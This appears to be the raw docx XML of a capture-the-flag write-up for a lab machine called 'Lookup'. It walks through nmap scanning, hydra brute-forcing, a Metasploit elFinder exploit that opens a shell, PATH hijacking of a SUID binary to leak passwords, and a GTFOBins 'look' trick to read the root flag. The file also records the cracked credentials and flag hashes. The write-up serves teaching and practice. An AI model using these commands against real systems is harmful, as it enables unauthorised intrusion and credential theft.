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9BCC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Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E179269">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CE0CA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Target ip = 10.10.198.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FFA76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Lets go for the reconnaissance first guys check which ports are open and which services it is running and the os details of the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1942DE">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B18C2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Using nmap for that right now </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F73E3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Nmap -sC -sV -O -A -T4 10.10.198.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A66231A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="313245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C518">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4232F03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we get to know that the target is running a http service and shh on the respective port number 22, 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1E248">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9EC0F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Let’s try to check the website here first and see what is there </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF3C9B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="2411095"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1206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69B1">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2BC24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are unable to connect to the website let’s add it to our etc/hosts list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F871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512445"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="6" name="Picture 6" descr="Screenshot 2025-03-04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3-04 100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6EBF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8EDFD5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Now let’s check the website again </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C1AB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2218690"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot 2025-03-04 100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3-04 1001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3CD7">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E45D4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we see that there is a login page here let’s try to run a sql injection attack here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A41D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 have intercepted the request on burpsuite and saved that for the sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CAF0D">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0420FB4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Sqlmap -r lookup_burpsuite --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710135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97710"/>
            <wp:effectExtent l="0" t="0" r="635" b="13970"/>
            <wp:docPr id="9" name="Picture 9" descr="Screenshot 2025-03-04 10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3-04 1013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04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3187700"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12700"/>
            <wp:docPr id="8" name="Picture 8" descr="Screenshot 2025-03-04 101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3-04 1012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3FB5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C239C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 fields are not injectable so it is not vulnerable to sql injection lets try for the bruteforcing using hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36623A64">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ED1F1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Let’s try to run hydra for that target to brute force the login as we don’t have the username I will go for the username as admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688CDD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Hydra -l admin -P ../../../../usr/share/wordlist/rolyou.txt http-post-form ‘/login.php:username=^USER^:password=^PASS^:wrong password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77DDF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731520"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="Screenshot 2025-03-04 104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3-04 1046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A62C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9A1AF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Let’s try to login using the usrname and passsword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB0D39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admin:password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13969A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BD5E1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21455" cy="2319020"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12700"/>
            <wp:docPr id="11" name="Picture 11" descr="Screenshot 2025-03-04 10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3-04 1050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F1B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When we tried to login it says wrong username or password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B7933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Let’s try to find the corrects username </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E609979">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770587E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694690"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
            <wp:docPr id="12" name="Picture 12" descr="Screenshot 2025-03-04 105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3-04 1057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073D">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2063E7B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Jose:password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB9E1D6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F7C79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Lets add files.lookup.thm to the etc/hosts list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="2339975"/>
            <wp:effectExtent l="0" t="0" r="10795" b="6985"/>
            <wp:docPr id="13" name="Picture 13" descr="Screenshot 2025-03-04 105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3-04 1058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F16A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37ADD18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340" cy="2256790"/>
            <wp:effectExtent l="0" t="0" r="12700" b="13970"/>
            <wp:docPr id="14" name="Picture 14" descr="Screenshot 2025-03-04 11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3-04 1100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9ACB">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440C2FB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I get to know that the elfinder has vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F387EC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I searcch that on metasploit and used the php_connector exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD9B17">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE3648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977900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="15" name="Picture 15" descr="Screenshot 2025-03-04 110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3-04 1101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CAE6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444F27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 options to set for the metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7B7D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105660"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12700"/>
            <wp:docPr id="16" name="Picture 16" descr="Screenshot 2025-03-04 11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3-04 1102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6A73">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6485038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set RHOSTS files.lookup.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA055F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Set LHOSTS 10.17.9.230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F96D9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770" cy="465455"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985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DD062">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0980784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221865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="17" name="Picture 17" descr="Screenshot 2025-03-04 110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3-04 1109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CE8F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E88D5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after setting up the metasploit I have run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B4BCB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And gained ashell over that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409917AA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="678180"/>
            <wp:effectExtent l="0" t="0" r="10160" b="7620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1E7F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7796060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 gaining a shell I have spawn my pythonterminal here </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF007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Python3 -c ‘import pty; pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008708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656590"/>
            <wp:effectExtent l="0" t="0" r="3175" b="13970"/>
            <wp:docPr id="20" name="Picture 20" descr="Screenshot 2025-03-04 11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03-04 1115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6EC8">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0943A30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After that I was in the system I tried to find the files that I can use in the target system and can find something valuable to explot checking the SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3EB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Find / -perm /4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A09FD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533775"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="21" name="Picture 21" descr="Screenshot 2025-03-04 11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03-04 1117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0764">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F150B5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highlited one looks good let’s try to run it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9459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57700" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="22" name="Picture 22" descr="Screenshot 2025-03-04 111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03-04 11184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7253">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4D63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it is xecuting the id command an then will run the .passwords file this looks intresting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072B166">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="611505"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335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993D">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5374427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lets find the user.txt flag first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F359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Find /home -name user.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE43FC">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="427990"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13970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922B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B55B4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we get to know that the user think has the user.txt file that has the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8913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And also have the .password file wehere potential passwords could be stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D7B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Lets try to run the /usr/sbin/pwm the steps are given below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A607A2F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1751965"/>
            <wp:effectExtent l="0" t="0" r="5715" b="635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BE32A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4CD661">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For that we need to see the path variable of the target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFFF45">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="398145"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13335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FCD9">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713015AF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Lets copy the output of the command: id think</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D23DD">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="410210"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270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24F71">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CC96FD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Then paste that in /tmp/id command: echo ‘echo “uid=1000(think) gid=1000(think) groups=1000(think)”’ &gt; /tmp/id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D7A05">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="153035"/>
            <wp:effectExtent l="0" t="0" r="12700" b="14605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87345">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5708766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Then lets add this /tmp in the path variable command: export PATH=/tmp:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED43C2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Then give the /tmp/id execute permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978AD3D">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="6350" b="11430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C246">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292FB08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Now lets run the command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6294A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/usr/sbin/pwm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474772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we got te password list let’s save them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD19C0E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3973195"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="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091A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5192283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lets run Hydra to bruteforce the password for the ssh of think user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151CA854">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1515110"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8890"/>
            <wp:docPr id="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F169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we got the password for the think user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65291E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Think:josemario.AKA(think)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB4A7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let’s try to login into the ssh using the think user password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB1F3F5">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="4765040"/>
            <wp:effectExtent l="0" t="0" r="635" b="5080"/>
            <wp:docPr id="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AFFA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE4434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Here we got the user flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7472BE89">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3638550" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="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C659">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120C5AE6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
            <wp:docPr id="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2B4F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5720B83B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>38375fb4dd8baa2b2039ac03d92b820e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4784FCFA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CC8BE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after that we need to find a list of commands that the user can execute with sudo without entering the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E87E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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E4294">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="611505"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="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CB2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we get to see that there is a /usr/bin/look command that the user can execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC657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lok into the gtfobis for that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316B86E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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"https://gtfobins.github.io/gtfobins/look/#sudo"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https://gtfobins.github.io/gtfobins/look/#sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD82376">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D34DC7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on the website we get some commnds that we need to run for different things like you can read a file or become a sudo user or for the SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EAA3E2">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1693545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="13335"/>
            <wp:docPr id="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39C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run the file read commands for the root flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5403308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LFILE=/root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159C12C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/usr/bin/look ‘’ “$LFILE”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A3591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we got the root flag from the target</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="60E7CECB">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4819650" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="11430" b="5715"/>
            <wp:docPr id="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0AEFF">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59046EF1">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>5a285a9f257e45c68bb6c9f9f57d18e8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DB78A0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924425" cy="1362075"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>
            <wp:docPr id="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F8D19"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8AFF8D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214BEDA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6214BED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064D0C"/>
    <w:rsid w:val="1AAF5792"/>
    <w:rsid w:val="1BD15AB8"/>
    <w:rsid w:val="21B215FF"/>
    <w:rsid w:val="224F3D62"/>
    <w:rsid w:val="29076D93"/>
    <w:rsid w:val="2FAE2CFE"/>
    <w:rsid w:val="3BEB0401"/>
    <w:rsid w:val="3D096212"/>
    <w:rsid w:val="4F5111F9"/>
    <w:rsid w:val="60A77582"/>
    <w:rsid w:val="62D312D9"/>
    <w:rsid w:val="6D924C9C"/>
    <w:rsid w:val="78D254F4"/>
    <w:rsid w:val="7FD9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2025-03-04T04:21:10Z</dcterms:created>
  <dc:creator>yash yadav</dc:creator>
  <cp:lastModifiedBy>Yash Yadav</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-04T06:43:13Z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9E389481855B451793611D2167F7D055_12</vt:lpwstr>
  </property>
</Properties>
</file>